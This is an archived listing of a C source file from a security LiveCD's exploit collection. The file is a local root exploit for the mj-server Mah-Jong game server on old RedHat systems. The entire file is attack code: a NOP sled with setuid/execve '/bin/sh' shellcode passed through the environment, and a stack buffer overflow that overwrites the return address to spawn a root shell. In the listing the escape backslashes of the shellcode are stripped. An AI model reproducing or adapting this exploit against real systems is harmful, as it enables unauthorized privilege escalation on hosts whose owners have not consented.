Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / mah-jong / ex-mj.c < prev

Wrap

C/C++ Source or Header | 2005-02-12 | 1.6 KB | 57 lines

/* * mj-server(client) local root(possible in debian) exploit * test in (redhat7.2----redhat8.0) * coded by jsk * * (c) Ph4nt0m Security Team /www.ph4nt0m.org * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFSIZE 150 char shellcode[] = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x31xc0x31xdbxb0x17xcdx80xebx1fx5ex89x76x08x31" "xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8d" "x56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxff" "xffx2fx62x69x6ex2fx73x68x58"; void banner (void); void banner (void) { fprintf (stdout, "\n [+] mj-server local exploit mail:<jsk@ph4nt0m.net>"); fprintf (stdout, "\n [+] by jsk < <a href="http://www.ph4nt0m.org" target="_blank"><a href="http://www.ph4nt0m.org" target="_blank">www.ph4nt0m.org</a></a>> talk with me <irc.0x557.org #ph4nt0m> "); fprintf (stdout, "\n [+] spawning shell \n\n"); } int main(void) { char buf[BUFSIZE+16]; char *prog[] = {"/home/mj-1.4-src/mj-server","--server", buf, NULL}; char *env[] = {"HOME=jsk", shellcode, NULL}; unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) - strlen(shellcode) - 0x02; memset(buf,0x41,sizeof(buf)); memcpy(buf+BUFSIZE,(char *)&ret,4); memcpy(buf+BUFSIZE+4,(char *)&ret,4); memcpy(buf+BUFSIZE+8,(char *)&ret,4); buf[BUFSIZE+12] = 0x00; printf("\n [+] Using address: 0x%x", ret); banner (); execve(prog[0],prog,env); return 0; }